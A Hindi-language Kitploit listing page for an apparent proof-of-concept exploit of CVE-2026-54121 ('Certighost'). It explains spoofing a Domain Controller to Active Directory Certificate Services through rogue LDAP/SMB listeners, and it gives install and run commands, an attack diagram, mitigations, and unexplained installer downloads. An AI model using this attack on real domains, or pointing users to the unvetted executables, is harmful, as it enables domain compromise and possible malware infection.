Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-54121-Certighost — CVE-2026-54121 (Certighost) के लिए प्रूफ-ऑफ-कॉन्सेप्ट मॉड्यूल, जो रोग LDAP/SMB लिसनर के माध्यम से AD CS नामांकन सत्यापन का शोषण करके Domain Controller का प्रतिरूपण करता है और PKINIT के माध्यम से एस्केलेशन करता है। | Kitploit
उपकरण/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपहचान छुपाने के उपकरणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणपेपर और शोधरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

CVE-2026-54121 (Certighost) के लिए प्रूफ-ऑफ-कॉन्सेप्ट मॉड्यूल, जो रोग LDAP/SMB लिसनर के माध्यम से AD CS नामांकन सत्यापन का शोषण करके Domain Controller का प्रतिरूपण करता है और PKINIT के माध्यम से एस्केलेशन करता है।

रिपॉजिटरी देखें
13घं 49मि पहलेअभी तक समीक्षित नहीं

🛡 AI Security Tool मॉड्यूल
CVE-2026-54121: Active Directory Certificate Services प्रतिरूपण (Certighost)

AI Security Tool इकोसिस्टम के लिए आधिकारिक सुरक्षा ऑडिट मॉड्यूल


Latest Release Build Status Donations Telegram Channel License

🌐 वेब डेमो • 📚 प्रोजेक्ट वेबसाइट • 💬 कम्युनिटी चैट

वेबसाइट नेविगेशन: होम • अपडेट्स • डाउनलोड्स • मॉड्यूल्स

AI Security Tool Banner


🧠 वैचारिक अवलोकन

यह मॉड्यूल CVE-2026-54121 के लिए नैदानिक क्षमताएँ प्रदान करता है, जिसे Certighost कहा जाता है। यह भेद्यता Active Directory Certificate Services (AD CS) के भीतर कंप्यूटर खाता प्रमाणपत्र नामांकन के सत्यापन चरण के दौरान मौजूद है।

मानक निम्न-विशेषाधिकार प्राप्त डोमेन क्रेडेंशियल रखने वाला हमलावर एक नया कंप्यूटर खाता बनाता है और हेरफेर किए गए cdc (नियंत्रित IP लिसनर) और rmd (लक्ष्य DC FQDN) विशेषताओं वाला प्रमाणपत्र अनुरोध सबमिट करता है। जब Certificate Authority (CA) मशीन की पहचान सत्यापित करने के लिए वापस कनेक्ट होता है, तो दुर्भावनापूर्ण LDAP (पोर्ट 389) और SMB/LSA (पोर्ट 445) लिसनर लक्ष्य Domain Controller की पहचान विशेषताओं (sAMAccountName, SID, dNSHostName) को स्पूफ करते हैं। यह CA को एक प्रामाणिक Domain Controller प्रमाणपत्र जारी करने के लिए धोखा देता है, जिससे PKINIT के माध्यम से पूर्ण डोमेन समझौता संभव हो जाता है।

🎯 मुख्य प्रभाव दर्शन

"मशीन के रूप में प्रमाणित करें, पूरे डोमेन तक बढ़ें।"
Certighost CA की पहचान समाधान पाइपलाइन को ज़हर देकर पारंपरिक AD CS टेम्पलेट अनुमतियों को बायपास करता है। एक वैध Domain Controller प्रमाणपत्र प्राप्त करने से तत्काल PKINIT प्रमाणीकरण मिलता है, जिससे TGT क्रेडेंशियल कैश (.ccache) और लक्ष्य DC का NT हैश दोनों प्राप्त होते हैं।

📊 भेद्यता विशिष्टताएँ

🕸 हमला परिदृश्य और आर्किटेक्चर

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 शमन चेकलिस्ट

  • 🟢 सुरक्षा अपडेट लागू करें: AD CS सर्वरों पर CVE-2026-54121 को संबोधित करने वाले आधिकारिक Microsoft पैच तैनात करें।
  • 🟢 मशीन खाता निर्माण प्रतिबंधित करें: गैर-व्यवस्थापक उपयोगकर्ताओं को नए कंप्यूटर ऑब्जेक्ट बनाने से रोकने के लिए ms-DS-MachineAccountQuota को 0 पर सेट करें।
  • 🟡 AD CS हार्डनिंग: भेद्य प्रमाणपत्र टेम्पलेट्स अक्षम करें और सुनिश्चित करें कि EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) बंद है जब तक कि स्पष्ट रूप से आवश्यक न हो।
  • 🟡 नेटवर्क फ़िल्टरिंग: CA सर्वरों से मनमाने वर्कस्टेशनों तक आउटबाउंड SMB (445) और LDAP (389) ट्रैफ़िक को ब्लॉक करें।

💻 इस मॉड्यूल को कैसे चलाएँ

⚠️ महत्वपूर्ण: यह मॉड्यूल AI Security Tool फ्रेमवर्क के भीतर सुरक्षित नैदानिक परीक्षण के लिए डिज़ाइन किया गया है। केवल उच्च प्रशासनिक विशेषाधिकारों वाले अधिकृत लक्ष्यों के विरुद्ध निष्पादित करें।

1️⃣ AI Security Tool इंस्टॉल करें

नैदानिक और निगरानी स्क्रिप्ट निष्पादित करने के लिए, कोर AI Security Tool फ्रेमवर्क इंस्टॉल करें:

2️⃣ निर्भरताएँ इंस्टॉल करें और निष्पादन

दुर्भावनापूर्ण LDAP/SMB लिसनर और प्रमाणपत्र प्रबंधन के लिए आवश्यक Python लाइब्रेरी इंस्टॉल करें:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 सुरक्षा ऑडिट मॉड्यूल और PoC रिपॉज़िटरी

हमारे समुदाय द्वारा अनुरक्षित भेद्यता स्कैनर मॉड्यूल, PoC स्क्रिप्ट, और शोध रिपॉज़:

🔥 रिमोट कोड एक्ज़ीक्यूशन (RCE) और नेटवर्क भेद्यताएँ 4 मॉड्यूल
  • CVE-2026-41089 — Netlogon रिमोट कोड एक्ज़ीक्यूशन एक्सप्लॉइट @ZeroDayEvil
  • CVE-2026-20805 — Windows रिमोट कोड एक्ज़ीक्यूशन प्रूफ-ऑफ-कॉन्सेप्ट @ZeroDayEvil
  • CVE-2026-41096 — क्रिटिकल RCE भेद्यता स्कैनर मॉड्यूल @ZeroDayEvil
  • CVE-2026-24291 — नेटवर्क प्रोटोकॉल रिमोट कोड एक्ज़ीक्यूशन @ZeroDayVPN
🛡 विशेषाधिकार वृद्धि (EoP) और सेवाएँ 3 मॉड्यूल
  • CVE-2026-54121 — AD CS Certighost Domain Controller प्रतिरूपण @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice सेवा विशेषाधिकार वृद्धि @ZeroDayVPN
  • CVE-2026-50416 — स्थानीय विशेषाधिकार वृद्धि राइटअप और PoC @ZeroDayEvil
📚 भेद्यता शोध और राइटअप 2 मॉड्यूल
  • CVE-2026-42978 — गहन तकनीकी विश्लेषण और PoC शोध @ZeroDayEvil
  • CVE-2026-83991 — पूर्ण राइटअप और शोषण प्रदर्शन @ZeroDayVPN

⚖️ लाइसेंस और कानूनी अस्वीकरण

🚨 अस्वीकरण

यह टूल और सुरक्षा विश्लेषण सख्ती से अधिकृत सिस्टम ऑडिटिंग, रक्षात्मक शोध, और पेनेट्रेशन टेस्टिंग एंगेजमेंट के लिए प्रदान किया गया है।
सिस्टम स्वामी से स्पष्ट लिखित अनुमति के बिना डोमेन वातावरणों के विरुद्ध CVE-2026-54121 को निष्पादित करना अवैध है। लेखक अनधिकृत डोमेन समझौता, डेटा हानि, या सिस्टम व्यवधानों के लिए कोई ज़िम्मेदारी नहीं लेते हैं।

🔄 योगदान और समुदाय

हम सुरक्षा शोध समुदाय से योगदान का स्वागत करते हैं! प्राथमिक योगदान क्षेत्र:

  1. AI एकीकरण: नए LLM प्रदाताओं को जोड़ना और विशेष सुरक्षा एजेंट विकसित करना।
  2. सुरक्षा टूल्स: भेद्यता मॉड्यूल विकसित करना और CLI स्कैनर एकीकृत करना।
  3. अनुकूलन: पार्सर गति, निष्पादन सुरक्षा, और कैशिंग लॉजिक को बढ़ाना।
  4. दस्तावेज़ीकरण: शोध पत्र, गाइड, और स्थानीयकृत अनुवाद लिखना।

🔗 संपर्क और सहायता

  • आधिकारिक वेबसाइट: ZeroDayEvil.com
  • तकनीकी विश्लेषण: H0j3n द्वारा Gist विश्लेषण
  • MSRC सलाहकार: CVE-2026-54121 गाइड
  • Telegram एडमिन: @ZeroDayEvil
  • Telegram चैट: @ZeroDyaTool_chat
  • Telegram चैनल: @ZeroDyaTool_channel
  • प्रोजेक्ट प्रायोजित करें: PayPal दान
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — साइबरसुरक्षा पेशेवरों के लिए टर्मिनल वर्कफ़्लो और ऑटोमेशन की पुनर्कल्पना।

टूल डाउनलोड करें
विशिष्टतानिर्धारित माननोट्स
CVE पहचानकर्ताCVE-2026-54121Active Directory Certificate Services प्रतिरूपण
गंभीरता रेटिंगक्रिटिकल (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
भेद्यता प्रकारCWE-287 / CWE-290अनुचित प्रमाणीकरण / स्पूफिंग के माध्यम से प्रमाणीकरण बायपास
प्रभावित घटकActive Directory Certificate Services (AD CS)प्रमाणपत्र नामांकन और पहचान सत्यापन पाइपलाइन
हमला वेक्टरनेटवर्कSMB, LDAP, और RPC प्रोटोकॉल पर दूर से निष्पादित
आवश्यक विशेषाधिकारनिम्न विशेषाधिकारमानक डोमेन उपयोगकर्ता खाता (मशीन खाते जोड़ने की क्षमता)
OS / प्लेटफ़ॉर्मसंस्करणआर्किटेक्चर / प्रारूपरिलीज़ दिनांकस्थितिडाउनलोड लिंक
🪟 Windowsv6.3.20x64 इंस्टॉलर (.exe)2026-09-08🟢 नवीनतम.exe डाउनलोड करें
🪟 Windowsv6.3.20x64 पोर्टेबल (.tar.gz)2026-09-08🟢 नवीनतम.tar.gz डाउनलोड करें
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 स्थिर.dmg डाउनलोड करें
🐧 Linuxv5.3.27यूनिवर्सल x64 (.tar.gz)2026-09-01🟢 स्थिर.tar.gz डाउनलोड करें
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 स्थिर.apk डाउनलोड करें